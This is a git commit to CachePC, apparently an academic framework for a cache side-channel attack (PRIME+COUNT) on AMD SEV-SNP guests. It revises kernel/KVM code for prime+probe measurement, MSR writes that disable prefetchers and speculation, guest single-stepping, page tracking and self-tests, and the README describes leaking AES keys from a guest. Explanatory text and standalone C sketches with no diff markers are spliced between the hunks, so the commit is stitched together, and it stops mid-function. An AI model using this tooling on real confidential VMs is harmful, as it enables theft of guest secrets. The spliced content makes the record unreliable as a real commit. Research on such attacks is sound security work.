commit 3f43dd1778c7ac8c09c3dc5612ac902c3a7ad84d
parent f2ea010b8180b4160d85c92e312971d0cd8a34d4
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 19 Jan 2023 01:48:16 +0100
Many fixes, more precise single-stepping and more robust self-tests
Diffstat:
9 files changed, 323 insertions(+), 367 deletions(-)
diff --git a/Makefile b/Makefile
@@ -22,6 +22,7 @@ all: build $(BINS)
clean:
$(MAKE) -C $(LINUX) clean M=arch/x86/kvm
$(MAKE) -C $(LINUX) clean M=crypto
+ rm -f cachepc/*.o
rm -f $(BINS)
$(LINUX)/arch/x86/kvm/cachepc:
diff --git a/README b/README
@@ -6,6 +6,10 @@ attack dubbed PRIME+COUNT that we demonstrate can be used to circumvent
AMD's latest secure virtualization solution SEV-SNP to access sensitive
guest information.
+
+tests
+-----
+
Several test-cases were used to verify parts of the exploit chain separately:
test/eviction:
@@ -43,9 +47,14 @@ test/qemu-poc:
Demonstrate that AES encryption keys can be leaked from an
unmodified qemu-based linux guest.
-Testing was done on a bare-metal AMD EPYC 72F3 (Family 0x19, Model 0x01)
-cpu and Supermicro H12SSL-i V1.01 motherboard. The following BIOS settings
-differ from the defaults:
+
+setup
+-----
+
+Testing was done on a Supermicro H12SSL-i V1.01 motherboard and an AMD EPYC
+72F3 (Family 0x19, Model 0x01) CPU.
+
+The following BIOS settings differ from the defaults:
Advanced > CPU Configuration > Local APIC Mode = xAPIC
Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled
@@ -57,11 +66,17 @@ Advanced > CPU Configuration > SEV ASID Space Limit = 110
Advanced > CPU Configuration > SNP Memory (RMP Table) Coverage = Enabled
Advanced > North Bridge Configuration > SEV-SNP Support = Enabled
Advanced > North Bridge Configuration > Memory Configuration > TSME = Disabled
-Advanced > PCI Devices Common Settings > Memory Configuration > TSME = Disabled
+
+The following kernel parameters were used:
+
+kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info
+ isolcpus=2,10,3,11 nohz_full=2,10,3,11 rcu_nocbs=2,10,3,11 nmi_watchdog=0
+ transparent_hugepage=never apic lapic panic=-1
To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure
that a host kernel debian package was built using `make host`.
-Note: because of bad decisions made in regards to version control,
-the checked out commit of the modified kernel (previously the
-kernel patch file) might be incorrect for older revisions.
+Because of bad decisions made with regard to version control, the checked-out
+commit of the modified kernel (previously the kernel patch file) might be
+incorrect for older revisions.
+
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c
@@ -1,6 +1,8 @@
#include "cachepc.h"
#include "uapi.h"
+#include "../../include/asm/processor.h"
+
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/slab.h>
@@ -28,29 +30,28 @@ static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);
bool
cachepc_verify_topology(void)
{
+ uint32_t assoc, linesize;
+ uint32_t size, sets;
uint32_t val;
- uint32_t assoc;
- uint32_t linesize;
- uint32_t size;
- uint32_t sets;
if (PAGE_SIZE != L1_SETS * L1_LINESIZE)
CPC_ERR("System pagesize does not guarentee "
"virtual memory access will hit corresponding "
- "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE\n");
+ "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE");
+
/* REF: https://developer.amd.com/resources/developer-guides-manuals
* (PPR 17H 31H, P.81) */
- asm volatile ("cpuid" : "=c"(val) : "a"(0x80000005));
+ val = native_cpuid_ecx(0x80000005);
size = ((val >> 24) & 0xFF) * 1024;
assoc = (val >> 16) & 0xFF;
linesize = val & 0xFF;
sets = size / (linesize * assoc);
if (size != L1_SIZE || assoc != L1_ASSOC
|| linesize != L1_LINESIZE || sets != L1_SETS) {
- CPC_ERR("L1 topology is invalid!\n");
- CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
+ CPC_ERR("L1 topology is invalid!\n");
+ CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
L1_SIZE, size);
CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n",
L1_ASSOC, assoc);
@@ -61,7 +62,7 @@ cachepc_verify_topology(void)
return true;
}
- asm volatile ("cpuid" : "=c"(val) : "a"(0x80000006));
+ val = native_cpuid_ecx(0x80000006);
size = ((val >> 16) & 0xFFFF) * 1024;
assoc = (val >> 12) & 0xF;
linesize = val & 0xFF;
@@ -117,18 +118,31 @@ cachepc_verify_topology(void)
}
void
+cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits)
+{
+ uint64_t val, newval;
+ uint32_t lo, hi;
+
+ asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+ val = (uint64_t) lo | ((uint64_t) hi << 32);
+ val &= ~clear_bits;
+ val |= set_bits;
+ asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00));
+
+ asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+ newval = (uint64_t) lo | ((uint64_t) hi << 32);
+ if (val != newval)
+ CPC_ERR("Write MSR failed at addr %08llX\n", addr);
+}
+
+void
cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
uint8_t host_guest, uint8_t kernel_user)
{
- uint64_t event;
uint64_t reg_addr;
+ uint64_t event;
- /* REF: https://developer.amd.com/resources/developer-guides-manuals
- * (PPR 19H 01H, P.166)
- *
- * performance event selection via 0xC001_020X with X = (0..A)[::2]
- * performance event reading viea 0XC001_020X with X = (1..B)[::2]
- */
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */
WARN_ON(index >= 6);
if (index >= 6) return;
@@ -138,7 +152,8 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
event |= (1ULL << 22); /* enable performance counter */
event |= ((kernel_user & 0b11) * 1ULL) << 16;
event |= ((host_guest & 0b11) * 1ULL) << 40;
- printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X (%016llx)\n",
+
+ printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n",
index, event_no, event_mask, event);
asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
}
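
For orientation, the event word assembled here follows the standard AMD
PERF_CTL layout. A minimal standalone sketch of the same encoding (field
positions per the PPR reference above; this is not the module's own helper,
just an illustration):

	#include <stdint.h>

	/* PERF_CTL bit layout (PPR Family 19h Model 01h): event select low
	 * byte in bits 7:0, unit mask in bits 15:8, os/user filter in bits
	 * 17:16, counter enable in bit 22, host/guest filter in bits 41:40. */
	uint64_t
	perf_ctl_encode(uint8_t event_no, uint8_t event_mask,
		uint8_t host_guest, uint8_t kernel_user)
	{
		uint64_t event;

		event = event_no | ((uint64_t) event_mask << 8);
		event |= 1ULL << 22; /* enable performance counter */
		event |= ((uint64_t) (kernel_user & 0b11)) << 16;
		event |= ((uint64_t) (host_guest & 0b11)) << 40;
		return event;
	}
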
@@ -154,7 +169,8 @@ cachepc_reset_pmc(uint8_t index)
reg_addr = 0xc0010201 + index * 2;
value = 0;
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value));
+
+ asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00));
}
cache_ctx *
@@ -247,6 +263,7 @@ cachepc_save_msrmts(cacheline *head)
cachepc_msrmts[curr_cl->cache_set] = curr_cl->count;
}
+ curr_cl->count = 0;
curr_cl = curr_cl->prev;
} while (curr_cl != head);
@@ -289,8 +306,8 @@ cachepc_update_baseline(void)
void __attribute__((optimize(1))) // prevent instruction reordering
cachepc_prime_vcall(uintptr_t ret, cacheline *cl)
{
- if (cachepc_single_step)
- cachepc_apic_oneshot(cachepc_apic_timer);
+ if (cachepc_singlestep)
+ cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV);
cachepc_prime(cl);
asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
}
diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h
@@ -42,6 +42,8 @@
#define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0)
#define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0)
+#define CPC_APIC_TIMER_SOFTDIV 3
+
typedef struct cacheline cacheline;
typedef struct cache_ctx cache_ctx;
@@ -83,6 +85,7 @@ static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8);
bool cachepc_verify_topology(void);
+void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits);
void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
uint8_t host_guest, uint8_t kernel_user);
void cachepc_reset_pmc(uint8_t index);
@@ -129,10 +132,11 @@ extern bool cachepc_baseline_active;
extern bool cachepc_pause_vm;
-extern bool cachepc_single_step;
-extern uint32_t cachepc_track_mode;
+extern bool cachepc_singlestep;
+extern bool cachepc_singlestep_reset;
extern uint32_t cachepc_apic_timer;
+extern uint32_t cachepc_track_mode;
extern uint64_t cachepc_track_start_gfn;
extern uint64_t cachepc_track_end_gfn;
@@ -166,7 +170,7 @@ cachepc_prime(cacheline *head)
cachepc_mfence();
cachepc_cpuid();
-
+
curr_cl = head;
do {
prev_cl = curr_cl;
diff --git a/cachepc/event.c b/cachepc/event.c
@@ -181,6 +181,8 @@ cachepc_handle_ack_event_ioctl(uint64_t eventid)
write_lock(&cachepc_event_lock);
if (!eventid || eventid == cachepc_last_event_sent) {
+ if (cachepc_event.type == CPC_EVENT_PAUSE)
+ cachepc_pause_vm = false;
err = 0;
cachepc_last_event_acked = cachepc_last_event_sent;
} else {
diff --git a/cachepc/kvm.c b/cachepc/kvm.c
@@ -16,6 +16,8 @@
#include <linux/types.h>
#include <asm/uaccess.h>
+#define TEST_REPEAT_MAX 200
+
bool cachepc_debug = false;
EXPORT_SYMBOL(cachepc_debug);
@@ -44,15 +46,17 @@ EXPORT_SYMBOL(cachepc_rip);
EXPORT_SYMBOL(cachepc_rip_prev);
EXPORT_SYMBOL(cachepc_rip_prev_set);
-bool cachepc_single_step = false;
-uint32_t cachepc_track_mode = false;
+bool cachepc_singlestep = false;
+bool cachepc_singlestep_reset = false;
uint32_t cachepc_apic_timer = 0;
-EXPORT_SYMBOL(cachepc_single_step);
-EXPORT_SYMBOL(cachepc_track_mode);
+EXPORT_SYMBOL(cachepc_singlestep);
+EXPORT_SYMBOL(cachepc_singlestep_reset);
EXPORT_SYMBOL(cachepc_apic_timer);
+uint32_t cachepc_track_mode = false;
uint64_t cachepc_track_start_gfn = 0;
uint64_t cachepc_track_end_gfn = 0;
+EXPORT_SYMBOL(cachepc_track_mode);
EXPORT_SYMBOL(cachepc_track_start_gfn);
EXPORT_SYMBOL(cachepc_track_end_gfn);
@@ -91,9 +95,9 @@ EXPORT_SYMBOL(cachepc_event_avail);
bool cachepc_events_init;
EXPORT_SYMBOL(cachepc_events_init);
-static void cachepc_kvm_prime_probe_test(void *p);
-static void cachepc_kvm_stream_hwpf_test(void *p);
-static void cachepc_kvm_single_eviction_test(void *p);
+static noinline void cachepc_kvm_prime_probe_test(void);
+static noinline void cachepc_kvm_stream_hwpf_test(void);
+static noinline void cachepc_kvm_single_eviction_test(void *p);
static void cachepc_kvm_system_setup(void);
@@ -109,104 +113,96 @@ static int cachepc_kvm_calc_baseline_ioctl(void __user *arg_user);
static int cachepc_kvm_read_baseline_ioctl(void __user *arg_user);
static int cachepc_kvm_apply_baseline_ioctl(void __user *arg_user);
-//static int cachepc_kvm_single_step_ioctl(void __user *arg_user);
-
static int cachepc_kvm_vmsa_read_ioctl(void __user *arg_user);
static int cachepc_kvm_svme_read_ioctl(void __user *arg_user);
+static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
static int cachepc_kvm_track_mode_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_page_ioctl(void __user *arg_user);
-// static int cachepc_kvm_track_all_ioctl(void __user *arg_user);
-// static int cachepc_kvm_untrack_all_ioctl(void __user *arg_user);
-static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_range_start_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_range_end_ioctl(void __user *arg_user);
// static int cachepc_kvm_track_exec_cur_ioctl(void __user *arg_user);
-static int cachepc_kvm_vm_pause_ioctl(void __user *arg_user);
-static int cachepc_kvm_vm_resume_ioctl(void __user *arg_user);
-
static int cachepc_kvm_poll_event_ioctl(void __user *arg_user);
static int cachepc_kvm_ack_event_ioctl(void __user *arg_user);
+static int cachepc_kvm_req_pause_ioctl(void __user *arg_user);
+
void
-cachepc_kvm_prime_probe_test(void *p)
+cachepc_kvm_prime_probe_test(void)
{
cacheline *lines;
cacheline *cl, *head;
uint32_t count;
- uint32_t *arg;
- int i, max;
-
- arg = p;
+ int n;
/* l2 data cache hit & miss */
cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
- max = cachepc_ctx->nr_of_cachelines;
-
- cachepc_cpuid();
- cachepc_mfence();
+ // wbinvd();
- for (i = 0; i < max; i++)
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + i) : "rbx");
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ head = cachepc_prime(cachepc_ds);
+ cachepc_probe(head);
- head = cachepc_prime(cachepc_ds);
- cachepc_probe(head);
+ count = 0;
+ cl = head = cachepc_ds;
+ do {
+ if (CL_IS_FIRST(cl->flags))
+ count += cl->count;
+ cl = cl->next;
+ } while (cl != head);
- count = 0;
- cl = head = cachepc_ds;
- do {
- count += cl->count;
- cl = cl->next;
- } while (cl != head);
-
- CPC_WARN("Prime-probe test done (%u vs. %u => %s)\n",
- count, 0, (count == 0) ? "passed" : "failed");
+ if (count != 0) {
+ CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n",
+ n, count, 0);
+ break;
+ }
+ }
- if (arg) *arg = (count == 0);
+ if (n == TEST_REPEAT_MAX)
+ CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0);
kfree(lines);
}
void
-cachepc_kvm_stream_hwpf_test(void *p)
+cachepc_kvm_stream_hwpf_test(void)
{
cacheline *lines;
+ const uint32_t max = 4;
uint32_t count;
- uint32_t *arg;
- uint32_t max;
-
- arg = p;
+ int n;
/* l2 data cache hit & miss */
cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
- max = 10;
+ // wbinvd();
+
count = 0;
- cachepc_prime(cachepc_ds);
-
- count -= cachepc_read_pmc(CPC_L1MISS_PMC);
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 4) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 5) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 6) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 7) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 8) : "rbx");
- asm volatile ("mov (%0), %%rbx" : : "r"(lines + 9) : "rbx");
- count += cachepc_read_pmc(CPC_L1MISS_PMC);
-
- CPC_WARN("HWPF test done (%u vs. %u => %s)\n",
- count, max, count == max ? "passed" : "failed");
-
- if (arg) *arg = (count == max);
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ cachepc_prime(cachepc_ds);
+
+ count -= cachepc_read_pmc(CPC_L1MISS_PMC);
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
+ asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
+ count += cachepc_read_pmc(CPC_L1MISS_PMC);
+
+ if (count != max) {
+ CPC_ERR("HWPF %i. test failed (%u vs. %u)\n",
+ n, count, max);
+ break;
+ }
+ }
+
+ if (n == TEST_REPEAT_MAX)
+ CPC_INFO("HWPF test ok (%u vs. %u)\n", count, max);
kfree(lines);
}
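
The count arithmetic in these tests brackets a handful of loads with two raw
counter reads. cachepc_read_pmc itself is not part of this diff; as a hedged
sketch, a userspace analogue boils down to rdpmc (legal outside ring 0 only
when CR4.PCE is set; on this family, rdpmc index n reads the counter behind
PERF_CTR MSR 0xc0010201 + 2*n):

	#include <stdint.h>

	static inline uint64_t
	read_pmc(uint32_t idx)
	{
		uint32_t lo, hi;

		asm volatile ("rdpmc" : "=a"(lo), "=d"(hi) : "c"(idx));
		return (uint64_t) lo | ((uint64_t) hi << 32);
	}
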
@@ -218,7 +214,7 @@ cachepc_kvm_single_eviction_test(void *p)
cacheline *ptr;
uint32_t target;
uint32_t *arg;
- int count;
+ int n, count;
arg = p;
@@ -231,27 +227,38 @@ cachepc_kvm_single_eviction_test(void *p)
ptr = cachepc_prepare_victim(cachepc_ctx, target);
- head = cachepc_prime(cachepc_ds);
- cachepc_victim(ptr);
- cachepc_probe(head);
-
- count = 0;
- evicted = NULL;
- cl = head = cachepc_ds;
- do {
- if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
- evicted = cl;
- count += cl->count;
+ // wbinvd();
+
+ for (n = 0; n < TEST_REPEAT_MAX; n++) {
+ head = cachepc_prime(cachepc_ds);
+ cachepc_victim(ptr);
+ cachepc_probe(head);
+
+ count = 0;
+ evicted = NULL;
+ cl = head = cachepc_ds;
+ do {
+ if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
+ evicted = cl;
+ count += cl->count;
+ }
+ cl = cl->next;
+ } while (cl != head);
+
+ if (count != 1 || evicted->cache_set != target) {
+ CPC_ERR("Single eviction %i. test failed (%u vs %u)\n",
+ n, count, 1);
+ if (arg) *arg = count;
+ break;
}
- cl = cl->next;
- } while (cl != head);
- CPC_WARN("Single eviction test done (%u vs %u => %s)\n",
- count, 1, (count == 1 && evicted->cache_set == target)
- ? "passed" : "failed");
- cachepc_save_msrmts(head);
+ cachepc_save_msrmts(head);
+ }
- if (arg) *arg = count;
+ if (n == TEST_REPEAT_MAX) {
+ CPC_INFO("Single eviction test ok (%u vs %u)\n", count, 1);
+ if (arg) *arg = count;
+ }
cachepc_release_victim(cachepc_ctx, ptr);
}
@@ -259,69 +266,41 @@ cachepc_kvm_single_eviction_test(void *p)
void
cachepc_kvm_system_setup(void)
{
- uint64_t reg_addr, val;
- uint32_t lo, hi;
-
/* NOTE: since most of these MSRs are poorly documented and some
* guessing work was involved, it is likely that one or more of
* these operations are not needed */
- /* disable streaming store */
- reg_addr = 0xc0011020;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling streaming store (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* disable speculative data cache tlb reloads */
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 4;
- CPC_WARN("Disabling speculative reloads (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* disable data cache hw prefetchers */
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling DATA HWPF (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+ // /* disable streaming store */
+ // cachepc_write_msr(0xc0011020, 0, 1ULL << 13);
+
+ // /* disable speculative data cache tlb reloads */
+ // cachepc_write_msr(0xc0011022, 0, 1ULL << 4);
+
+ // /* disable data cache hw prefetchers */
+ // cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
/* disable inst cache hw prefetchers */
- reg_addr = 0xc0011021;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 13;
- CPC_WARN("Disabling INST HWPF (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- /* REF: https://arxiv.org/pdf/2204.03290.pdf
- * Paper "Memory Performance of AMD EPYC Rome and Intel Cascade
- * Lake SP Server Processors"
- * disable L1 & L2 prefetchers */
-
- reg_addr = 0xc0011022;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val |= 1 << 16;
- printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
- reg_addr = 0xc001102b;
- asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
- val = (uint64_t) lo | ((uint64_t) hi << 32);
- val &= ~1ULL;
- printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
- reg_addr, val);
- asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+ cachepc_write_msr(0xc0011021, 0, 1ULL << 13);
+
+ /* REF: https://arxiv.org/pdf/2204.03290.pdf */
+ /* l1 and l2 prefetchers */
+ cachepc_write_msr(0xc0011022, 0, 1ULL << 16);
+ cachepc_write_msr(0xc001102b, 1ULL << 0, 0);
+
+ /* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */
+ cachepc_write_msr(0xc001102b, 0, 1ULL << 18);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168
+ * disable L1 and L2 prefetcher */
+ cachepc_write_msr(0xC0000108, 0, 0b00101111);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111
+ * disable speculation */
+ cachepc_write_msr(0x00000048, 0, 0b10000111);
+
+ /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175
+ * disable core performance boost */
+ cachepc_write_msr(0xC0010015, 0, 1ULL << 25);
}
int
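
The MSR addresses and bit positions above can be spot-checked after module
load. A hedged sketch using the msr kernel module (requires root and a loaded
msr module; addresses and set-bits copied from the cachepc_write_msr calls
above, and whether each bit reads back as set is model-specific):

	#include <stdio.h>
	#include <stdint.h>
	#include <fcntl.h>
	#include <unistd.h>

	/* MSRs written by cachepc_kvm_system_setup() and the bits set there. */
	static const struct { uint32_t msr; uint64_t bits; } checks[] = {
		{ 0xc0011021, 1ULL << 13 }, /* inst cache hw prefetcher */
		{ 0xc0011022, 1ULL << 16 }, /* l1 & l2 prefetchers */
		{ 0xc001102b, 1ULL << 18 }, /* prefetcher (community ref) */
		{ 0xc0000108, 0b00101111 }, /* l1 & l2 prefetchers (PPR) */
		{ 0x00000048, 0b10000111 }, /* speculation controls */
		{ 0xc0010015, 1ULL << 25 }, /* core performance boost */
	};

	int
	main(void)
	{
		uint64_t val;
		size_t i;
		int fd;

		fd = open("/dev/cpu/0/msr", O_RDONLY);
		if (fd < 0) { perror("open"); return 1; }
		for (i = 0; i < sizeof(checks) / sizeof(checks[0]); i++) {
			if (pread(fd, &val, 8, checks[i].msr) != 8) continue;
			printf("%08x: %s\n", checks[i].msr,
				(val & checks[i].bits) == checks[i].bits
				? "bits set" : "bits not set");
		}
		close(fd);
		return 0;
	}
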
@@ -351,6 +330,11 @@ cachepc_kvm_reset_ioctl(void __user *arg_user)
cachepc_kvm_reset_tracking_ioctl(NULL);
cachepc_kvm_reset_baseline_ioctl(NULL);
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
+ cachepc_apic_timer = 0;
+ cachepc_rip_prev_set = false;
+
return 0;
}
@@ -455,74 +439,6 @@ cachepc_kvm_apply_baseline_ioctl(void __user *arg_user)
}
int
-cachepc_kvm_single_step_ioctl(void __user *arg_user)
-{
- cachepc_single_step = true;
-
- return 0;
-}
-
-int
-cachepc_kvm_track_mode_ioctl(void __user *arg_user)
-{
- struct kvm_vcpu *vcpu;
- uint32_t mode;
-
- if (!arg_user) return -EINVAL;
-
- if (copy_from_user(&mode, arg_user, sizeof(mode)))
- return -EFAULT;
-
- cachepc_single_step = false;
- cachepc_track_mode = mode;
-
- BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
- vcpu = xa_load(&main_vm->vcpu_array, 0);
-
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
- cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
-
- switch (mode) {
- case CPC_TRACK_FULL:
- cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
- mode = CPC_TRACK_FULL;
- break;
- case CPC_TRACK_EXEC:
- cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
- mode = CPC_TRACK_EXEC;
- break;
- default:
- mode = CPC_TRACK_NONE;
- break;
- }
-
- return 0;
-}
-
-int
-cachepc_kvm_track_page_ioctl(void __user *arg_user)
-{
- struct cpc_track_config cfg;
- struct kvm_vcpu *vcpu;
-
- if (!main_vm || !arg_user) return -EINVAL;
-
- if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
- return -EFAULT;
-
- if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
- return -EINVAL;
-
- BUG_ON(xa_empty(&main_vm->vcpu_array));
- vcpu = xa_load(&main_vm->vcpu_array, 0);
- if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
- return -EFAULT;
-
- return 0;
-}
-
-int
cachepc_kvm_vmsa_read_ioctl(void __user *arg_user)
{
struct kvm_vcpu *vcpu;
@@ -563,50 +479,6 @@ cachepc_kvm_svme_read_ioctl(void __user *arg_user)
return 0;
}
-// int
-// cachepc_kvm_track_all_ioctl(void __user *arg_user)
-// {
-// struct kvm_vcpu *vcpu;
-// uint32_t mode;
-//
-// if (!main_vm || !arg_user) return -EINVAL;
-//
-// if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// return -EFAULT;
-//
-// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// return -EINVAL;
-//
-// BUG_ON(xa_empty(&main_vm->vcpu_array));
-// vcpu = xa_load(&main_vm->vcpu_array, 0);
-// if (!cachepc_track_all(vcpu, mode))
-// return -EFAULT;
-//
-// return 0;
-// }
-//
-// int
-// cachepc_kvm_untrack_all_ioctl(void __user *arg_user)
-// {
-// struct kvm_vcpu *vcpu;
-// uint32_t mode;
-//
-// if (!main_vm || !arg_user) return -EINVAL;
-//
-// if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// return -EFAULT;
-//
-// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// return -EINVAL;
-//
-// BUG_ON(xa_empty(&main_vm->vcpu_array));
-// vcpu = xa_load(&main_vm->vcpu_array, 0);
-// if (!cachepc_untrack_all(vcpu, mode))
-// return -EFAULT;
-//
-// return 0;
-// }
-
int
cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
{
@@ -619,15 +491,16 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
- cachepc_track_mode = CPC_TRACK_NONE;
-
cachepc_inst_fault_gfn = 0;
cachepc_inst_fault_err = 0;
cachepc_track_start_gfn = 0;
cachepc_track_end_gfn = 0;
- cachepc_single_step = false;
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
+
+ cachepc_track_mode = CPC_TRACK_NONE;
list_for_each_entry_safe(fault, next, &cachepc_faults, list) {
list_del(&fault->list);
@@ -638,31 +511,73 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
}
int
-cachepc_kvm_poll_event_ioctl(void __user *arg_user)
+cachepc_kvm_track_mode_ioctl(void __user *arg_user)
{
- if (!cachepc_events_init)
- return -EINVAL;
+ struct kvm_vcpu *vcpu;
+ uint32_t mode;
- return cachepc_handle_poll_event_ioctl(arg_user);
-}
+ if (!arg_user) return -EINVAL;
-int
-cachepc_kvm_ack_event_ioctl(void __user *arg_user)
-{
- uint64_t eventid;
+ if (copy_from_user(&mode, arg_user, sizeof(mode)))
+ return -EFAULT;
- if (!arg_user) return -EINVAL;
+ BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
+ vcpu = xa_load(&main_vm->vcpu_array, 0);
- if (!cachepc_events_init)
- return -EINVAL;
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
- if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
- return -EFAULT;
+ cachepc_apic_timer = 0;
